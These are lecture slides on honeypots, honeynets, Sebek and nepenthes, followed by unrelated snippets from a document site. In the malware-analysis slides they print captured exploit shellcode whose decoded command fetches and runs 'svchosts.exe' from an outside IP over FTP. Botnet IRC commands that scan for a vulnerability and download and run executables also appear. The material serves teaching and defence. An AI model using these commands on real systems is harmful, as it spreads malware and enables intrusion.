• No results found

Honeypots UNIVERSITÄT MANNHEIM. A quick overview. Pi1 - Laboratory for Dependable Distributed Systems

N/A
N/A
Protected

Academic year: 2021

Share "Honeypots UNIVERSITÄT MANNHEIM. A quick overview. Pi1 - Laboratory for Dependable Distributed Systems"

Copied!
41
0
0

Loading.... (view fulltext now)

Full text

(1)

UNIVERSITÄT

MANNHEIM

Honeypots

(2)

Outline

Motivation

High-interaction vs. low-interaction honeypots

Gen III honeynets

honeyd

nepenthes

(3)

Intro

We see more and more abuses of

communication systems (but only the outcome!)

Spam & Phishing

Bots & Botnets

Cracker exploiting vulnerabilities

...

How can we learn more about this threat?

(4)

Basic Problem

How can we defend against an enemy, when we don’t even know who the enemy is?

(5)

The Cuckoo’s Egg (Clifford Stoll)

DTK (Fred Cohen)

Honeyd (Niels Provos)

Honeynet Project Code

Mantrap (jails - Symantec)

Specter (Netsec - specter.com)

KFSensor (Keyfocus.net)

Network Telescopes / Sinkholes

Large setups at AV Companies

“A honeypot is an information system ressource whose value lies in unauthorized or illicit use of that ressource.”

(6)

High- vs.

Low-interaction

(7)

Different Approaches

High-interaction Low-interaction

Real services, OS’s, or applications

Emulation of TCP/IP stack, vulnerabilities, ...

Higher risk Lower risk

Hard to deploy / maintain Easy to deploy / maintain Capture extensive amount

of information

Capture quantitative

information about attacks Example: Gen III honeynets Examples: honeyd, nepenthes, labrea, ...

(8)

Honeynets

Network of high-interaction honeypot designed to capture in-depth information.

Information has different value to different organizations.

It is an architecture you populate with live systems, not a product or software.

(9)

GenIII Architecture

(10)

Concept

Honeynet is highly controlled network

Every packet that enters or leaves the network is by definition suspicious

Three basic blocks

Data Control

Data Capture

Data Analysis

}

Honeywall

(11)

Honeywall

Transparent bridge

Easiest way to deploy Honeywall

Linux 2.6 or 2.4 with ebtables-patch

Hardened system

Three interfaces for routing & management

GenIII honeynets: Roo Honeywall CDROM (more on that later)

(12)

Data Control

What happens after a compromise?

Possibly malicious! Legal issues?

(13)

Data Control

Data Control enables mechanism to control incoming and outgoing traffic

Mitigate risk!

(14)

Data Control

Snort_inline (http://snort-inline.sf.net)

Modification of IDS Snort

New rules drop, replace & reject

Example rules used for botnet tracking

alert tcp $HOME any <> $EXTERNAL any (msg:"IRC topic"; flow:established; content:"TOPIC"; nocase;

replace:"T0PIC";)

drop tcp $HOME any <> $EXTERNAL 445 (msg:"bot-scan"; flow:established;)

(15)

Data Control

In addition to exploits, DDoS attacks also pose a threat ➙ Connection-limiting via iptables

Enable some outgoing connections so that attacker can get tool and connect to IRC

### Set the connection outbound limits for different protocols.

SCALE="day" TCPRATE="15" UDPRATE="20" ICMPRATE="50"

OTHERRATE="15" # IPsec, IPv6 tunnel, and

(16)

Data Capture

How do you observe an intruder without him noticing?

How can you observe encrypted sessions?

tcpdump/tethereal is worthless

How can you observe the keystrokes?

How can you observe the execution flow of a program?

(17)

Data Capture: Sebek

Simple script can’t log activity of programs

Use rootkit-based techniques to observe the intruder! ➙Sebek

Hidden kernel module that captures (almost) all activity

Dumps activity to the network

Attacker can’t sniff any traffic since TCP/IP stack of all honeypots is modified

(18)

Thorsten Holz • “Reaktive Sicherheit - Honeynets” - Universität Dortmund UNIVERSITÄTMANNHEIM

Data Capture: Sebek

Figure 2

The conceptual representation of read system call redirection.

When a process calls the standard read() function in user space, a system call is made. This call maps to an index offset in the System Call Table array. Because Sebek modified the function pointer at the read index to point to its own implementation, the execution switches into the kernel context and begins executing the new Sebek read call. At this point Sebek has complete view all data accessed with this system call. This same technique could be used for any System Call that we may wish to monitor.

Data that remains encrypted is of little use; to view the data or act on it in some way it must be decrypted. In the case of an SSH session the keystrokes are decrypted and send to the shell to have actions performed. This act typically involves a system call. By collecting data in kernel space, we can gain access to the data within the system call, after it has been decrypted but before it has been passed to the process that is about to use it. Thus we circumvent the encryption and capture the keystrokes, file transfers, Burneye passwords, etc.

(19)

Thorsten Holz • “Reaktive Sicherheit - Honeynets” - Universität Dortmund UNIVERSITÄTMANNHEIM

Data Capture: Sebek

Figure 3

Conceptual representation of Sebek packet generation. Note how packets created by Sebek bypass the stack and go directly to the network device driver. This makes it far more difficult for attacker to detect Sebek activity.

Because Sebek generates its own packets and sends them directly to the device driver, there is no ability for a user to block the packets with IPTABLES or monitor them with a network sniffer. This prevents an intruder on a honeypot from detecting the presence of Sebek by examining the LAN traffic. A secondary problem that must be addressed is the need to keep honeypot A from detecting Sebek packets from honeypot B. The use of Ethernet switching does not solve this problem. Sebek is naturally impervious to ARP spoofing because it does not use ARP to obtain the destination MAC address that corresponds to the destination IP address, however there are a couple of situations where A would see B’s Packets3. In these situations, an intruder would be able to detect the presence of Sebek packets on the LAN by running a sniffer on honeypot A and would see honeypot B’s Sebek packets.

To solve this problem, Sebek installs its own implementation of the Raw Socket interface. This new version is programmed to silently ignore Sebek packets. Sebek packets are defined as those that have both a predetermined destination UDP port and the proper magic number set in the Sebek header. If these two values matches what is expected, then we know this a packet to ignore. The implementation simply does nothing with Sebek packets; it drops them on the floor

3 Ethernet switches will send ethernet frames to every switch port when they do not have an entry in their

Switch Forwarding Table for the destination host. The most common situation we run into is where the MAC for the destination expires.

(20)

Data Analysis

Most work has to be done in the area of Data Analysis

Lots of manual analysis

tethereal, p0f, tcpflow, custom scripts, ...

Analysis of IRC logs

Analysis of obtained tools

Profiling of attackers?

(21)

Roo Honeywall

Based on Fedora Core 3

Automated, headless installation

Web-based interface (“Walleye”) for administration and Data Analysis

Balas, Viecco: “Towards a Third Generation Data Capture Architecture for Honeynets”, IEEE Information Assurance Workshop, 2005

(22)

Low-interaction

No real systems, just emulation

honeyd (http://honey.org)

Emulation of TCP/IP stacks

Fool fingerprinting tools like nmap

Scripts can simulate service

nepenthes (http://nepenthes.mwcollect.org)

Emulate vulnerable parts of services

(23)

nepenthes

Tool to automatically “collect” malware like bots and other autonomous spreading malware

Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities

(24)

Architecture

Modular architecture

Vulnerability modules

Shellcode handler

Download modules

Submission modules

Trigger events

(25)
(26)

Vulnerability modules

Emulate vulnerable services

Play with exploits until they send us their payload (finite state machine)

Currently more than 20 available vulnerability modules

More in development

Analysis of known vulnerabilities & exploits necessary

(27)

Shellcode modules

Automatically extract URL used by malware to transfer itself to

compromised machine

sch_generic_xor

Generic XOR decoder

sch_generic_createprocess

sch_generic_url

(28)

[ dia ] =---[ hexdump(0x1bf7bb68 , 0x000010c3) ]---= [ dia ] 0x0000 00 00 10 bf ff 53 4d 42 73 00 00 00 00 18 07 c8 ...SMB s... [ dia ] 0x0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 13 ... ...7. [ dia ] 0x0020 00 00 00 00 0c ff 00 00 00 04 11 0a 00 00 00 00 ... ... [ dia ] 0x0030 00 00 00 7e 10 00 00 00 00 d4 00 00 80 7e 10 60 ...~.... ...~.` [ dia ] 0x0040 82 10 7a 06 06 2b 06 01 05 05 02 a0 82 10 6e 30 ..z..+.. ...n0 [ dia ] 0x0050 82 10 6a a1 82 10 66 23 82 10 62 03 82 04 01 00 ..j...f# ..b... [ dia ] 0x0060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAA AAAAAAAA [...]

[ dia ] 0x0450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAA AAAAAAAA [ dia ] 0x0460 03 00 23 82 0c 57 03 82 04 0a 00 90 42 90 42 90 ..#..W.. ....B.B. [ dia ] 0x0470 42 90 42 81 c4 54 f2 ff ff fc e8 46 00 00 00 8b B.B..T.. ...F.... [ dia ] 0x0480 45 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb E<.|.x.. .O.._ .. [ dia ] 0x0490 e3 2e 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 ..I.4... 1...t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b 54 24 04 75 e3 8b 5f 24 ...; T$.u.._$ [ dia ] 0x04b0 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 1c 8b 01 eb ..f..K._ ... [ dia ] 0x04c0 89 5c 24 04 c3 31 c0 64 8b 40 30 85 c0 78 0f 8b .\$..1.d [email protected].. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b 68 08 e9 0b 00 00 00 8b 40 @..p...h ...@ [ dia ] 0x04e0 34 05 7c 00 00 00 8b 68 3c 5f 31 f6 60 56 eb 0d 4.|....h <_1.`V.. [ dia ] 0x04f0 68 ef ce e0 60 68 98 fe 8a 0e 57 ff e7 e8 ee ff h...`h.. ..W... [ dia ] 0x0500 ff ff 63 6d 64 20 2f 63 20 65 63 68 6f 20 6f 70 ..cmd /c echo op [ dia ] 0x0510 65 6e 20 38 34 2e 31 37 38 2e 35 34 2e 32 33 39 en 84.17 8.54.239 [ dia ] 0x0520 20 36 32 30 31 20 3e 3e 20 69 69 20 26 65 63 68 6201 >> ii &ech [ dia ] 0x0530 6f 20 75 73 65 72 20 61 20 61 20 3e 3e 20 69 69 o user a a >> ii [ dia ] 0x0540 20 26 65 63 68 6f 20 62 69 6e 61 72 79 20 3e 3e &echo b inary >> [ dia ] 0x0550 20 69 69 20 26 65 63 68 6f 20 67 65 74 20 73 76 ii &ech o get sv [ dia ] 0x0560 63 68 6f 73 74 73 2e 65 78 65 20 3e 3e 20 69 69 chosts.e xe >> ii [ dia ] 0x0570 20 26 65 63 68 6f 20 62 79 65 20 3e 3e 20 69 69 &echo b ye >> ii [ dia ] 0x0580 20 26 66 74 70 20 2d 6e 20 2d 76 20 2d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x0590 69 20 26 64 65 6c 20 69 69 20 26 73 76 63 68 6f i &del i i &svcho

cmd /c

echo open 84.178.54.239 >> ii & echo user a a >> ii & echo binary >> ii & echo get svchosts.exe >> ii & echo bye >> ii & ftp -n -v -s:ii &

del ii &

svchosts.exe

(29)

Statistics: nepenthes

Four months nepenthes on /18 network:

50,000,000+ files downloaded

14,000+ unique binaries based on md5sum

~1,000 different botnets

Anti-virus engines detect between 70% and 90% of the binaries

(30)

Examples

What have we learned?

(31)

Phishing

Phishing incidents in UK and Germany

Compromise

Phishing website

Phishing e-mails

or: redirection of traffic

Learned more about typical proceeding of attackers

(32)

C&C Server Bot Bot Bot IRC Attacker hax0r.example.com $advscan dcom135 200 5 0 -b

Botnets

Botnet: network of compromised machines that can be remotely controlled by an attacker

Mainly used for DDoS, spam, identity theft, ...

Capture bot samples with the help of honeypots

(33)

Conclusion

Honeypots allow us to learn more about attacks

Lure in attackers and study them in a fish-bowl environment

Easy to setup, maintenance is harder

We can for example learn more about phishing

Proceeding by attackers

Other use cases for honeypots include credit card fraud, collecting malware, botnet tracking, web-based attacks, client-side attacks, ...

(34)

UNIVERSITÄT

Pi1 - Laboratory for Dependable Distributed Systems

MANNHEIM

Thorsten Holz

http://www-pi1.informatik.uni-mannheim.de/ [email protected]

More information: http://honeyblog.org http://www.honeynet.org

(35)

CWSandbox

(36)

Example

Mocbot & MS06-040

(37)

Introduction

MS Security Bulletin MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution

(August 8, 2006)

PoC exploit released a couple of days later

Botnets quickly adopt new infection vector

Now: tracking of one botnet that uses this vulnerability

gzn.lx.irc-XXX.org:45130 Main channel: ##Xport##

(38)

##Xport##

00:06 < RBOT|JPN|XP-SP0-51673> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 59.87.205.37. 00:06 < RBOT|USA|XP-SP1-29968> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 24.85.98.171. 00:07 < RBOT|USA|2K-90511> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.192.56.89. 00:07 < RBOT|ITA|2K-89428> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.0.189.99.

00:07 < RBOT|PRT|XP-SP0-17833> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 89.152.114.8. 00:07 < RBOT|F|USA|XP-SP0-67725> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 192.168.1.4. 00:07 < RBOT|USA|XP-SP0-62279> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 12.75.18.139. 00:07 < RBOT|JPN|XP-SP0-77299> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 219.167.140.234. 00:07 < RBOT|FRA|2K-22302> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 83.112.179.38.

00:08 < RBOT|ESP|XP-SP0-16174> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 81.37.168.73. 00:08 < RBOT|GBR|XP-SP1-63539> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 86.128.154.138. 00:08 < RBOT|USA|2K-54815> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 204.16.147.68.

00:08 < RBOT|ESP|XP-SP0-36463> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.222.226.84. 00:08 < RBOT|ITA|2K-39418> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 82.59.174.137.

00:08 < RBOT|F|ESP|XP-SP1-72157> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 192.168.1.17. 00:09 < RBOT|BRA|XP-SP0-17313> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.64.25.118. 00:09 < RBOT|USA|XP-SP0-47155> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.8.5.13. 00:09 < RBOT|DEU|XP-SP1-35171> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.245.51.164. 00:10 < RBOT|ESP|2K-80303> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.255.31.232. 00:10 < RBOT|ESP|XP-SP1-12053> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.105.18.75. 00:11 < RBOT|CHN|2K-65840> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 58.100.35.86.

00:11 < RBOT|USA|XP-SP1-96851> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 130.13.191.175. 00:11 < RBOT|F|ESP|XP-SP1-95745> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 192.168.1.3. 00:11 < RBOT|VEN|XP-SP1-57583> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.8.45.203. 00:11 < RBOT|FRA|XP-SP0-10211> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 82.225.190.135. 00:12 < RBOT|JPN|XP-SP1-82855> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 220.159.58.228. 00:13 < RBOT|DEU|XP-SP0-36079> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.245.91.14. 00:13 < RBOT|USA|XP-SP0-73488> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.82.175.110. 00:13 < RBOT|ITA|2K-77534> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 82.58.161.75.

00:13 < RBOT|DNK|XP-SP1-74556> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 80.164.66.104. 00:13 < RBOT|ESP|XP-SP0-46788> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.234.141.206. 00:15 < RBOT|JPN|2K-94205> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 60.56.67.251.

(39)

Channels

♚ ##Xport##: .ircraw join ##scan##,##DR##,

##frame##,##o##

⇉ ##scan##: .scan netapi 100 3 0 -r -b -s

$$ ##DR##: .download http://promo.dollarrevenue.com/ webmasterexe/drsmartload152a.exe c:\dr.exe 1 -s

$$ ##frame##: .download http://zchxsikpgz.biz/dl/ loadadv518.exe c:\frm.exe 1 -s

* ##o##: .download http://64.18.150.156/~niga/ nads.exe c:\nds.exe 1 -s

(40)
(41)

Economics of Botnets

$ grep US 2006-08-28.log | wc -l 998

$ grep CAN 2006-08-28.log | wc -l 20

$ grep GBR 2006-08-28.log | wc -l 103

$ grep CHN 2006-08-28.log | wc -l 756

$ egrep -v "US|CAN|GBR|CHN” 2006-08-28.log | wc -l 5852

998 * 0.3 + 20 * 0.2 + 103 * 0.1 +

References

Related documents

While both the percentage of OTA ads and frequency of trademark usage were notable on Bing, a different trend emerged on Google. Beyond the fact that OTA ads per SERP were

The penalty in this study is de fined as the periodic loss in the recre- ation-related ecosystem services suffered by anglers when the freshwa- ter in flows in SRS falls below

As the third place brewery based on market share in the United States, Molson Coors has a narrow range of product lines with 12 different products under seven brands.. The

The most important job of the coach is cheerleader - getting students excited about the projects, the competition, and the awards, and encouraging full participation in all

In models with non-homothetic, non-CRRA utility functions the exchange rate change depends not only on the standard (“average”) inflation differential across countries (as in the

However, the component codes are considered individually if performed independently of the complete procedure and if not all the services listed in the comprehensive codes

Kožený poťah sedadiel Torino - v čiernej farbe Charcoal Black + elektricky vyhrievané predné sedadlá s funkciou regulácie teploty, elektricky nastaviteľné sedadlo vodiča

Moreover, consumers between the ages of 19 and 24 made relatively many contactless payments compared to the average consumer, followed by consumers between 25 and 34 years